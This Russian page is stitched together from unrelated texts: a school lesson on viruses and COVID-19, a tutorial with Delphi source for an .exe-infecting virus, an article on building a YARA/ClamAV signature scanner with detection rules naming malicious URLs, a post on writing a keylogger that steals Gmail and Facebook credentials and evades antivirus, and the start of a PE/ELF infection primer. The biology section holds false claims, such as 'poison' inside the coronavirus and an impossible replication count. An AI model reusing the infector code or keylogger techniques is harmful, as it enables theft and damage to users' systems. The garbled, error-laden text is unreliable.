Ищем вирус своими руками

Обновлено: 24.04.2024

Главная задача биологии — это развитие представлений у человека о живых организмах, о многообразии видов, обо всех закономерностях развития живых существ, а также об их взаимодействии с окружающей природой. Предмет основы безопасности жизнедеятельности (ОБЖ) позволяет получить знания и умения, которые помогут сохранить жизнь и здоровье в опасных ситуациях. Эти ситуации всегда возникают неожиданно, но, тем не менее, большинство из них предсказуемы и к ним можно подготовиться заранее. ОБЖ учит нас предвидеть возможные опасности и минимизировать потери от той или иной ситуации. Сегодня мы сталкиваемся с новым видом вирусной опасности COVID-19,о котором поговорим с точки зрения биологии и ОБЖ.

Что такое вирус?

Вирус — это неклеточный инфекционный агент. Сегодня нам известно около 6 тысяч различных вирусов, но их существует несколько миллионов. Вирусы не похожи друг на друга и могут иметь как форму сферы, спирали, так и форму сложного асимметричного сплетения. Размеры вирусов варьируются от 20 нм до 300 нм.

Как устроен вирус?

В центре агента находится генетический материал РНК или ДНК, вокруг которого располагается белковая структура — капсид.
Капсид служит для защиты вируса и помогает при захвате клетки. Некоторые вирусы дополнительно покрыты липидной оболочкой, т.е. жировой структурой, которая защищает их от изменений окружающей среды.

Вирусолог Дэвид Балтимор объединил все вирусы в 8 групп, из которых некоторые группы вирусов содержат 1-2 цепочки ДНК. Другие же содержат 1 цепочку РНК, которая может удваиваться или достраивать на своей матрице ДНК. При этом каждая группа вирусов производит себя в различных органеллах зараженной клетки.

Вирусы имеют определенный диапазон хозяев, т.е. он может быть опасен для одних видов и абсолютно безвреден для других. Например, оспой болеет только человек, а чумкой только некоторые виды плотоядных. Вирус не способен выжить сам по себе, поэтому активируется только в хозяйской клетке, используя ее ресурсы и питательные вещества. Цель вируса — создание множества копий себя, чтобы инфицировать другие клетки!

Вирусы

Как вирус попадает в организм?

  • через физические повреждения (например, порезы на коже)
  • путём направленного впрыскивания (к примеру, укус комара)
  • направленного поражения отдельной поверхности (например, при вдыхании вируса через трахею)
  • к эпителию слизистых оболочек (это например вирус гриппа)
  • к нервной ткани (вирус простого герпеса)
  • к иммунным клеткам (вирус иммунодефицита человека)

Биология. Рабочая тетрадь. 9 класс

Геном вируса встраивается в одну из органелл или цитоплазму и превращает клетку в настоящий вирусный завод. Естественные процессы в клетке нарушаются, и она начинает заниматься производством и сбором белка вируса. Этот процесс называется репликацией. И его основная цель — это захват территории. Во время репликации генетический материал вируса смешивается с генами клетки хозяина — это приводит к активной мутации самого вируса, а также повышает его выживаемость. Когда процесс репликации налажен, вирусная частица отпочковывается и заражает уже новые клетки, в то время как инфицированная ранее клетка продолжает производство.

Выход вируса

Вирус создал множество собственных копий, клетка оказывается изнуренной из-за использования ее ресурсов. Больше вирусу клетка не нужна, поэтому клетка часто погибает и новорожденным вирусам приходится искать нового хозяина. Это и есть заключительная стадию жизненного цикла вируса.

Скорость распространения вирусной инфекции

Размножение вирусов протекает с исключительно высокой скоростью: при попадании в верхние дыхательные пути одной вирусной частицы уже через 8 часов количество инфекционного потомства достигает 10³, а концу первых суток − 10²³.

Вирусная латентность

Как вирус распространяется?

  • воздушно-капельный (кашель, чихание)
  • с кожи на кожу (при прикосновениях и рукопожатиях)
  • с кожи на продукты (при прикосновениях к пище грязными руками вирусы могут попасть в пищеварительную и дыхательную системы)
  • через жидкие среды организма (кровь, слюну и другие)

Почему с вирусами так тяжело бороться?

Сегодня людям уже удалось победить некоторые вирусы, а некоторые взять под жесткий контроль. Например, Оспа (она же черная оспа). Болезнь вызывается вирусом натуральной оспы, передается от человека к человеку воздушно-капельным путем. Больные покрываются сыпью, переходящей в язвы, как на коже, так и на слизистых внутренних органов. Смертность, в зависимости от штамма вируса, составляет от 10 до 40 (иногда даже 70%), На сегодняшний день вирус полностью истреблен человечеством.

Кроме того, взяты под контроль такие заболевания, как бешенство, корь и полиомиелит. Но помимо этих вирусов существует масса других, которые требуют разработок или открытия новых вакцин.

Коронавирус

Виновником эпидемии, распространяющейся сегодня по миру, стал коронавирус, вирусная частица в 0,1 микрона. Свое название он получил благодаря наростам на своей структуре, своеобразным шипам. Внутри вируса спрятан яд, с помощью которого он подчиняет себе зараженный организм. Этот вирус воздействует не только на человека, но и на птиц, свиней, собак и летучих мышей. В настоящий момент выделяют от 30 до 39 разновидностей коронавирусной инфекции. Но для человека патогенно всего 6. И как любой другой вирус COVID-19 мутирует.

симптомы и признаки.jpg

К наиболее распространенным симптомам COVID-19 относятся повышение температуры тела, сухой кашель и утомляемость. К более редким симптомам относятся боли в суставах и мышцах, заложенность носа, головная боль, конъюнктивит, боль в горле, диарея, потеря вкусовых ощущений или обоняния, сыпь и изменение цвета кожи на пальцах рук и ног. Как правило, эти симптомы развиваются постепенно и носят слабо выраженный характер. У некоторых инфицированных лиц болезнь сопровождается очень легкими симптомами.

Сколько же может жить этот вирус вне организма? Все зависит от типа вируса и от той поверхности, на которую вирусы попали. В качестве примера было рассмотрено 3 вируса, по которым велись исследования. Изучали время, на которое может задерживаться вирус на различных поверхностях. Данные приведены в таблице.

Таблица

Поскольку пока не изобретено вакцины от COVID-19, в целях защиты от инфекции самым важным для нас является соблюдение гигиены.

Гигиена — раздел медицины, изучающий влияние жизни и труда на здоровье человека и разрабатывающая меры (санитарные нормы и правила), направленные на предупреждение заболеваний, обеспечение оптимальных условий существования, укрепление здоровья и продление жизни.

Сегодня следует соблюдать определенные правила гигиены:

  • Соблюдение режима труда и отдыха, не допускающего развития утомления и переутомления.
  • Выполнение условий, обеспечивающих здоровый и полноценный сон (свежий воздух, отсутствие шума, удобная постель, оптимальная продолжительность).
  • Правильное здоровое питание в соответствии с потребностями организма.
  • Комфортный микроклимат в жилище (температура, влажность и подвижность воздуха, естественная и искусственная освещенность помещений).
  • Содержание в чистоте тела и тщательный уход за зубами.
  • Спокойное и корректное поведение в конфликтных ситуациях.

профилактика.jpg

HLLO- High Level Language Overwrite. Такой вирус перезаписывает программу своим телом. Т.е.
программа уничтожается, а при попытке запуска программы пользователем- запускается вирус и "заражает" дальше.

HLLP- High Level Language Parasitic. Самые продвинутые. Приписывают свое тело к файлу спереди (Первым стартует вирус, затем он восстанавливает программу и запускает ее) или сзади
- тогда в заголовок проги мы пишем jmp near на тело вируса, все-таки запускаясь первыми.

Саму же программу мы можем оставить в неизменном виде, тогда это будет выглядеть так:

MZТело злобного вируса
MZКод программы

Что такое MZ, я думаю, ты догадался 🙂 Это же инициалы твоего любимого Марка Збиковски, которые он скромно определил в сигнатуру exe файла 🙂 А вписал я их сюда только для того, чтобы ты понЯл
- заражение происходит по принципу copy /b virus.exe program.exe, и никаких особых приколов тут нет. Сейчас нет. Но мы их с тобой нафигачим
- будь здоров :). Ну, например: можно первые 512 или больше байт оригинальной программы зашифровать любым известным тебе алгоритмом- XOR/XOR, NOT/NOT, ADD/SUB, тогда это будет выглядеть как:

MZтело злобного вируса
XORed часть ориг. проги
Неизменная часть ориг. проги

В этом случае структура зараженного файла не будет так понятна.
Я не зря тут (в классификации, в смысле) так распинаюсь
- parasitic-алгоритм используют 90% современных вирусов, независимо от их способа распространения. Ладно, идем дальше:

Сетевой вирус. Может быть любым из перечисленных. Отличается тем, что его распространение не
ограничивается одним компом, эта зараза каким-либо способом лезет через инет или локальную сеть на другие машины. Я думаю, ты регулярно выносишь из мыльника 3-4 таких друга
- вот тебе пример сетевого вируса. А уж попав на чужой комп, он заражает файлы произвольным образом, или не заражает ВООБЩЕ.

Макро вирусы, скриптовые вирусы, IRC вирусы. В одну группу я определил их потому, что это вирусы, написанные на языках, встроенных в приложения (MSOffice :)), скриптах (тут рулит твой любимый VBS) и IRC скриптах. Строго говоря, как только в каком-то приложении появляется достаточно мощная (и/или дырявая) скриптовая компонента, на ней тут же начинают писать вирусы 😉 Кстати, макро вирусы очень просты и легко определяются эвристикой.

Дошли 🙂 Давай, запускай дельфи, убивай всякие окошки и вытирай из окна проекта всю чушь. То есть вообще все вытирай 🙂 Мы будем работать только с DPRом, содержащим:

program EVIL_VIRUS;
USES WINDOWS,SYSUTILS;
begin
end;

Логику вируса, я думаю, ты уже понял из классификации- восстанавливаем и запускаем прогу--> ждем завершения ее работы--> стираем "отработавший файл" (забыл сказать- мы НЕ ЛЕЧИМ зараженную прогу, мы переносим оригинальный код в левый файл и запускаем его. ПРИМЕР: Зараженный файл NOTEPAD.EXE. Создаем файл _NOTEPAD.EXE в том же каталоге с оригинальным кодом, и запускаем уже его).--> ищем незараженное файло и заражаем. Это все 🙂 Базовая конструкция вируса выглядит именно так.

Объяви теперь для своего могучего мозга следующие переменные и константы:

VaR VirBuf, ProgBuf, MyBuf : array of char;
SR : TSearchRec;
My,pr : File;
ProgSize,result : integer;
PN,st : String;
si : Tstartupinfo;
p :Tprocessinformation;
infected : boolean;
CONST VirLen: longint= 1000000;

Первой строчкой идут динамические массивы, в которые мы будем писать соответственно тело вируса и программы; В переменную SR запишутся
характеристики найденного файла-кандидата на заражение (надеюсь, ты знаком с процедурами FindFirst и FindNext, потому что дальше будет хуже ;)), My и
Pr - это файл, откуда мы стартовали и левый файл с оригинальным кодом программы (я про него уже писал выше). result- результат работы FindFirst, он должен быть равен нулю,
ProgSize - размер кода программы. Остальное ясно из дальнейшего, кроме
infected - это признак зараженности найденного файла и
VirLen- это длина кода вируса, ее ты узнаешь только после свадьбы. Тьфу, я хотел сказать, после компиляции. Т.е. компилируешь, меняешь значение константы в исходнике и перекомпилируешь.
Кодим далее 🙂 Здесь ты видишь код, ответственный за восстановление и запуск зараженной программы:

Тут все, в принципе просто и понятно, кроме того, зачем я перенес весь зараженный файл в каталог к виндам и что делают строчки с 3 по 5 включительно.
А сделал я это потому, что читать из запущенного файла некомфортно и возможно только с использованием CreateFile и ReadFile WinAPI. Про кодинг на WinAPI я расскажу позднее, сейчас я разберу только основы
- на Delphi.

Строчки эти - преобразование string в pchar народным методом, поскольку мы сейчас боремся за каждый байт кода. Еще момент: я поступил некорректно, задав путь c:\windows так жестко. Пользуйся лучше процедурой GetWindowsDirectory, узнай точно 🙂 Все остальное понятно без всяких комментариев (если нет
завязывай прогуливать информатику ;)), идем дальше:

result:= FindFirst ('*.exe',faAnyFile,sr);
WHILE Result= 0 DO
begin
//Проверка на вшивость
Infected:= false;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= '03.08.98 06:00:00' then infected:= true;
//Проверено!
IF (infected= false)and (sr.name<>paramstr(0)) then
begin
AssignFile (my,sr.Name);
ReWrite (my);
BlockWrite (my,virbuf,virlen);
BlockWrite (my,progbuf,sr.Size);
CloseFile (my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime ('03.08.98 06:00:00')));
end;
end;

//Если вир запущен "чистым", т.е. не из зараженной про-граммы, то завершаемся
end else halt;

Что же твой зоркий глаз видит тут? Правильно, процедура FindFirst ищет нам заданную жертву (любой exe файл из текущего каталога), передает его характеристики в переменную SR. Затем необходимо его проверить на зараженность. Это делается оригинально: при заражении файлу присваивается опр. дата и время. И любой файл с такими характеристиками считается зараженным. Все остальное опять же нецензурно просто, поэтому я плавно перехожу к заключению 🙂

Вот мы и накодили наш первый вирус. Пока он умеет только заражать файлы в текущем каталоге (хотя, я уверен, ты его легко модернизируешь ;)) и ничего не знает про другие каталоги и интернет. Не отчаивайся, мы его этому быстро обучим. Пока поиграйся с этими строчками, и жди следующей статьи.

Рискну дать тебе описание всех процедур, использованных в статье. Это поможет тебе искать их в хелпе и подготовиться к кодингу серьезных вирусов с использованием
WinAPI.

AssignFile - в WinAPI нет аналога - сопоставляет файл
с переменной типа File или TextFile

Reset - аналоги _lopen и CreateFile - открывает
существующий файл и устанавливает позицию
чтения в начало

ReWrite - _lcreate и CreateFile - создает новый файл и
уст. позицию чтения в начало. Если скормить
ReWrite существующий файл, его содержимое
будет обнулено

BlockRead - _lread и ReadFile - читает в буфер
определенное количество данных из файла

BlockWrite - _lwrite и WriteFile - соответственно, пишет
данные в файл

SeekFile - _llseek и SetFilePointer - перемещает позицию
чтения/записи в открытом файле

Начальство поставило мне довольно интересную задачу. В сжатые сроки написать анализатор исполняемых файлов, который по сигнатурам умел бы находить тела вирусов и определять используемый упаковщик/криптор. Готовый прототип появился уже через пару часов.

Слово автора

Сразу хочу сказать, что это статья не про суровый реверсинг. И даже не про анализ малвари. Скорее я хотел бы поделиться опытом, как огромное количество открытых разработок позволяет быстро, буквально на коленке собрать прототипы систем, которые на начальных этапах вполне смогут справляться с поставленной задачей. Такого прототипа вполне может быть достаточно, чтобы оценить состоятельность разработки и понять, нужно ли двигаться в этом направлении вообще. Разработать прототип сигнатурного анализатора, который бы работал онлайн и мог быть дополнен новыми сигнатурами через веб-интерфейс, и стало моей задачей.
Сначала предлагалось найти какие-то открытые базы сигнатур малвари, что оказалось довольно просто. Но обо всем по порядку.

Сигнатурный анализ

Поиск вредоносного объекта по сигнатурам — это то, что умеет любой антивирус. В общем случае сигнатура — это формализованное описание некоторых признаков, по которым можно определить, что сканируемый файл — это вирус и вирус вполне определенный.

Что такое YARA?

Я был с самого начала убежден, что где-то в Сети уже есть открытые разработки, которая бы взяли на себя задачу определения соответствия между некоторой сигнатурой и исследуемым файлом. Если бы я смог найти такой проект, то его легко можно было бы поставить на рельсы веб-приложения, добавить туда разных сигнатур и получить то, что от меня требовалось. План стал казаться еще более реальным, когда я прочитал описание проекта YARA.

Сами разработчики позиционируют его как инструмент для помощи исследователям малвари в идентификации и классификации вредоносных семплов. Исследователь может создать описания для разного типа зловредов, используя текстовые или бинарные паттерны, в которых описываются формализованные признаки малвари. Таким образом получаются сигнатуры. По сути, каждое описание состоит из набора строк и некоторого логического выражения, на основе которого определяется логика срабатывания анализатора.

Если для исследуемого файла выполняются условия одного из правил, он определяется соответствующим образом (к примеру, червь такой-то). Простой пример правила, чтобы понимать, о чем идет речь:

rule silent_banker : banker
meta:
description = "This is just an example"
thread_level = 3
in_the_wild = true
strings:
$a =
$b =
$c = "UVODFRYSIHLNWPEJXQZAKCBGMT"
condition:
$a or $b or $c
>

В этом правиле мы говорим YARA, что любой файл, который содержит хотя бы одну из строк-семплов, описанных в переменных $a, $b, $c, должен классифицироваться как троян silent_banker. И это очень простое правило. На деле рулесы могут быть гораздо сложнее (мы об этом поговорим ниже).
Об авторитете проекта YARA говорит уже даже список проектов, которые его используют, а это:

Весь код написан на Python, причем пользователю предлагается как сам модуль для использования в своих разработках, так и просто исполняемый файл, чтобы юзать YARA как самостоятельное приложение. В рамках своей работы я выбрал первый вариант, но для простоты в статье мы будем использовать анализатор просто как консольное приложение.

Немного покопавшись, я довольно быстро разобрался, как писать для YARA правила, а также как прикрутить к нему сигнатуры вирусов от бесплатного авера и упаковщиков от PEiD. Но начнем мы с установки.

Установка

Как я уже сказал, проект написан на Python’е, поэтому легко может быть установлен и на Linux, и на Windows, и на Mac. На первых порах можно просто взять бинарник. Если вызвать приложение в консоли, то получим правила для запуска.

$ yara
usage: yara [OPTION]. [RULEFILE]. FILE | PID

То есть формат вызова программы следующий: сначала идет имя программы, затем список опций, после чего указывается файл с правилами, а в самом конце — имя исследуемого файла (или каталога, содержащего файлы), либо идентификатор процесса. Сейчас бы по-хорошему объяснить, как эти самые правила составляются, но не хочу сразу грузить тебя сухой теорией. Поэтому мы поступим по-другому и позаимствуем чужие сигнатуры, чтобы YARA мог выполнять одну из поставленных нами задач — полноценное определение вирусов по сигнатурам.

Свой антивирус

Первый содержит основную базу сигнатур, второй — самую полную на данный момент базу с различными дополнениями. Для поставленной цели вполне хватит daily.cvd, в котором собрано более 100 000 слепков малвари. Однако база ClamAV — это не база YARA, так что нам необходимо преобразовать ее в нужный формат. Но как? Ведь мы пока ничего не знаем ни о формате ClamAV, ни о формате Yara. Об этой проблеме уже позаботились до нас, подготовив небольшой скриптик, конвертирующий базу вирусных сигнатур ClamAV в набор правил YARA. Сценарий называется clamav_to_ yara.py и написан Мэтью Ричардом (bit.ly/ij5HVs). Скачиваем скрипт и конвертируем базы:

$ python clamav_to_yara.py -f daily.cvd -o clamav.yara

В результате в файле clamav.yara мы получим сигнатурную базу, которая сразу будет готова к использованию. Попробуем теперь комбинацию YARA и базы от ClamAV в действии. Сканирование папки с использованием сигнатуры выполняется одной единственной командой:

$ yara -r clamav.yara /pentest/msf3/data

Опция -r указывает, что сканирование необходимо проводить рекурсивно по всем подпапкам текущей папки. Если в папке /pentest/msf3/data были какие-то тела вирусов (по крайней мере тех, что есть в базе ClamAV), то YARA немедленно об этом сообщит. В принципе, это уже готовый сигнатурный сканер. Для большего удобства я написал простой скрипт, который проверял обновления базы у ClamAV, закачивал новые сигнатуры и преобразовывал их в формат YARA. Но это уже детали. Одна часть задачи выполнена, теперь можно приступать к составлению правил для определения упаковщиков/крипторов. Но для этого пришлось немного с ними разобраться.

Игра по правилам

Итак, правило — это основной механизм программы, позволяющий отнести заданный файл к какой-либо категории. Правила описываются в отдельном файле (или файлах) и по своему виду очень напоминают конструкцию struct<> из языка С/С++.

rule BadBoy
strings:
$a = "win.exe"
$b = "http://foo.com/badfi le1.exe"
$c = "http://bar.com/badfi le2.exe"
condition:
$a and ($b or $c)
>

В принципе, ничего сложного в написании правил нет. В рамках этой статьи я коснулся лишь основных моментов, а детали ты найдешь в мануле. Пока же десять самых важных пунктов:

1. Каждое правило начинается с ключевого слова rule, после которого идет идентификатор правила. Идентификаторы могут иметь такие же имена, как и переменные в C/С++, то есть состоять из букв и цифр, причем первый символ не может быть цифрой. Максимальная длина имени идентификатора — 128 символов.

2. Обычно правила состоят из двух секций: секция определений (strings) и секция условия (condition). В секции strings задаются данные, на основе которых в секции condition будет приниматься решение, удовлетворяет ли заданный файл определенным условиям.

$my_text_string = "text here"
$my_hex_string =

4.В секции condition содержится вся логика правила. Эта секция должна содержать логическое выражение, определяющее, в каком случае файл или процесс удовлетворяет правилу. Обычно в этой секции идет обращение к ранее объявленным строкам. А идентификатор строки рассматривается в качестве логической переменной, которая возвращает true, если строка была найдена в файле или памяти процесса, и false в противном случае. Вышеуказанное правило определяет, что файлы и процессы, содержащие строку win.exe и один из двух URL, должны быть отнесены к категории BadBoy (по имени правила).

Такой подход очень удобен при задании строк, длина которых известна, а содержимое может меняться. Если же часть строки может быть разной длины, удобно использовать диапазоны:

Данная запись означает, что в средине строки может быть от 4 до 6 различных байт. Можно реализовать также и альтернативный выбор:

Это означает, что на месте третьего байта может быть 62 В4 или 56, такой записи соответствуют строки F42362B445 или F4235645.

6. Чтобы проверить, что заданная строка находится по определенному смещению в файле или адресном пространстве процесса, используется оператор at:

$a at 100 and $b at 200

Если строка может находиться внутри определенного диапазона адресов, используется оператор in:

$a in (0..100) and $b in (100..fi lesize)

Иногда возникают ситуации, когда необходимо указать, что файл должен содержать определенное число из заданного набора. Делается это с помощью оператора of:

rule OfExample1
strings:
$foo1 = "dummy1"
$foo2 = "dummy2"
$foo3 = "dummy3"
condition:
2 of ($foo1,$foo2,$foo3)
>

Приведенное правило требует, чтобы файл содержал любые две строки из множества ($foo1,$foo2,$foo3). Вместо указания конкретного числа строк в файле можно использовать переменные any (хотя бы одна строка из заданного множества) и all (все строки из заданного множества).

7. Ну и последняя интересная возможность, которую надо рассмотреть — применение одного условия ко многим строкам. Эта возможность очень похожа на оператор of, только более мощная — это оператор for..of:

for expression of string_set : ( boolean_expression )

Данную запись надо читать так: из строк, заданных в string_ set, по крайней мере expression штук должно удовлетворять условию boolean_expression. Или, другими словами: выражение boolean_expression вычисляется для каждой строки из string_set, и expression из них должны возвратить значение True. Далее мы рассмотрим эту конструкцию на конкретном примере.

Делаем PEiD

Итак, когда с правилами все стало более менее ясно, можно приступать к реализации в нашем проекте детектора упаковщиков и крипторов. В качестве исходного материала на первых порах я позаимствовал сигнатуры известных упаковщиков у все того же PEiD. В папке plugins находится файл userdb.txt, который и содержит то, что нам нужно. В моей базе оказалось 1850 сигнатур.

Немало, так что для того, чтобы полностью импортировать их, советую написать какой-нибудь скриптик. Формат этой базы прост — используется обычный текстовый файл, в котором хранятся записи вида:

[Name of the Packer v1.0]
signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
ep_only = true

Первая строка задает имя упаковщика, которое будет отображаться в PEiD, для нас же это будет идентификатор правила. Вторая — непосредственно сама сигнатура. Третья — флаг ep_only, указывающий, искать ли данную строку только по адресу точки входа, или же по всему файлу.

Ну что, попробуем создать правило, скажем, для ASPack? Как оказалось, в этом нет ничего сложного. Сначала создадим файл для хранения правил и назовем его, например, packers.yara. Затем ищем в базе PEiD все сигнатуры, в названии которых фигурирует ASPack, и переносим их в правило:

Таким образом, наличие хоть одной из заданных строк по адресу точки входа будет означать, что файл упакован ASPack’ом. Обрати также внимание, что в данном правиле все строки заданы просто с помощью знака $, без идентификатора. Это возможно, так как в condition-секции мы не обращаемся к каким-то конкретным из них, а используем весь набор.

Чтобы проверить работоспособность полученной системы, достаточно выполнить в консоли команду:

$ yara -r packers.yara somefi le.exe

Скормив туда пару приложений, упакованных ASPack’ом, я убедился, что все работает!

Готовый прототип

YARA оказался на редкость понятным и прозрачным инструментом. Мне не составило большого труда написать для него вебадминку и наладить работу в качестве веб-сервиса. Немного креатива, и сухие результаты анализатора уже раскрашиваются разными цветами, обозначая степень опасности найденного зловреда. Небольшое обновление базы, и для многих из крипторов доступно краткое описание, а иногда даже и инструкция по распаковке. Прототип создан и работает отменно, а начальство пляшет от восторга!

image

Хакерский мир можно условно разделить на три группы атакующих:

Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО.

Зачем ИБ-персоналу эти сомнительные навыки?

Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно.

Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.
Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.

Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили.

Вы можете изучить больше про фунцию GetAsyncKeyState на MSDN:

Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:

Умный кейлогер

Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?
Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.

Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я увеличиваю шансы получения учетных данных.

Вторая версия кода:

Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры.

Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail.

Еще более умный кейлогер

Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.

Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:

Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.

Бесплатно и полностью не обнаружим

В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут.
Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения.

Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ?

Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось.

image

В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим. На этой странице вы можете ознакомиться с полным анализом.

Основная цель этой статьи – показать, что используя одни только антивирусы вы не сможете полностью обеспечить безопасность на предприятии. Нужен более глубинная оценка действий всех пользователей и даже сервисов, чтобы выявить потенциально вредоносные действия.

В следующих статья я покажу, как сделать действительно не обнаружимую версию такого ПО.


Поговорим о компьютерных вирусах? Нет, не о том, что вчера поймал ваш антивирус. Не о том, что вы скачали под видом инсталлятора очередного Photoshop. Не о rootkit-e, который стоит на вашем сервере, маскируясь под системный процесс. Не о поисковых барах, downloader-ах и другой малвари. Не о коде, который делает плохие вещи от вашего имени и хочет ваши деньги. Нет, всё это коммерция, никакой романтики…

В общем, для статьи вполне достаточно лирики, перейдем к делу. Я хочу рассказать о классическом вирусе, его структуре, основных понятиях, методах детектирования и алгоритмах, которые используются обеими сторонами для победы.

Мы будем говорить о вирусах, живущих в исполняемых файлах форматов PE и ELF, то есть о вирусах, тело которых представляет собой исполняемый код для платформы x86. Кроме того, пусть наш вирус не будет уничтожать исходный файл, полностью сохраняя его работоспособность и корректно инфицируя любой подходящий исполняемый файл. Да, ломать гораздо проще, но мы же договорились говорить о правильных вирусах, да? Чтобы материал был актуальным, я не буду тратить время на рассмотрение инфекторов старого формата COM, хотя именно на нем были обкатаны первые продвинутые техники работы с исполняемым кодом.

Начнём со свойств кода вируса. Чтобы код удобней было внедрять, разделять код и данные не хочется, поэтому обычно используется интеграция данных прямо в исполняемый код. Ну, например, так:


Все эти варианты кода при определенных условиях можно просто скопировать в память и сделать JMP на первую инструкцию. Правильно написав такой код, позаботившись о правильных смещениях, системных вызовах, чистоте стека до и после исполнения, и т.д., его можно внедрять внутрь буфера с чужим кодом.

  • Куда положить вирус? Необходимо найти достаточно места, чтобы вирус туда поместился, записать его туда, по возможности не разломав файл и так, чтобы в области, в которой вирус окажется, было разрешено исполнение кода.
  • Как передать управление на вирус? Просто положить вирус в файл недостаточно, надо еще совершить переход на его тело, а после завершения его работы вернуть управление программе-жертве. Или в другом порядке, но, в любом случае, мы же договорились не ломать ничего, да?

Исполняемый файл (PE или ELF) состоит из заголовка и набора секций. Секции – это выровненные (см. ниже) буферы с кодом или данными. При запуске файла секции копируются в память и под них выделяется память, причем совсем необязательно того объёма, который они занимали на диске. Заголовок содержит разметку секций, и сообщает загрузчику, как расположены секции в файле, когда он лежит на диске, и каким образом необходимо расположить их в памяти перед тем, как передать управление коду внутри файла. Для нас интересны три ключевых параметра для каждой секции, это psize, vsize, и flags. Psize (physical size) представляет собой размер секции на диске. Vsize (virtual size) – размер секции в памяти после загрузки файла. Flags – атрибуты секции (rwx). Psize и Vsize могут существенно различаться, например, если программист объявил в программе массив в миллион элементов, но собирается заполнять его в процессе исполнения, компилятор не увеличит psize (на диске содержимое массива хранить до запуска не нужно), а вот vsize увеличит на миллион чего-то там (в runtime для массива должно быть выделено достаточно памяти).

Флаги (атрибуты доступа) будут присвоены страницам памяти, в которые секция будет отображена. Например, секция с исполняемым кодом будет иметь атрибуты r_x (read, execute), а секция данных атрибуты rw_ (read,write). Процессор, попытавшись исполнить код на странице без флага исполнения, сгенерирует исключение, то же касается попытки записи на страницу без атрибута w, поэтому, размещая код вируса, вирмейкер должен учитывать атрибуты страниц памяти, в которых будет располагаться код вируса. Стандартные секции неинициализированных данных (например, область стека программы) до недавнего времени имели атрибуты rwx (read, write, execute), что позволяло копировать код прямо в стек и исполнять его там. Сейчас это считается немодным и небезопасным, и в последних операционных системах область стека предназначена только для данных. Разумеется, программа может и сама изменить атрибуты страницы памяти в runtime, но это усложняет реализацию.

Также, в заголовке лежит Entry Point — адрес первой инструкции, с которой начинается исполнение файла.

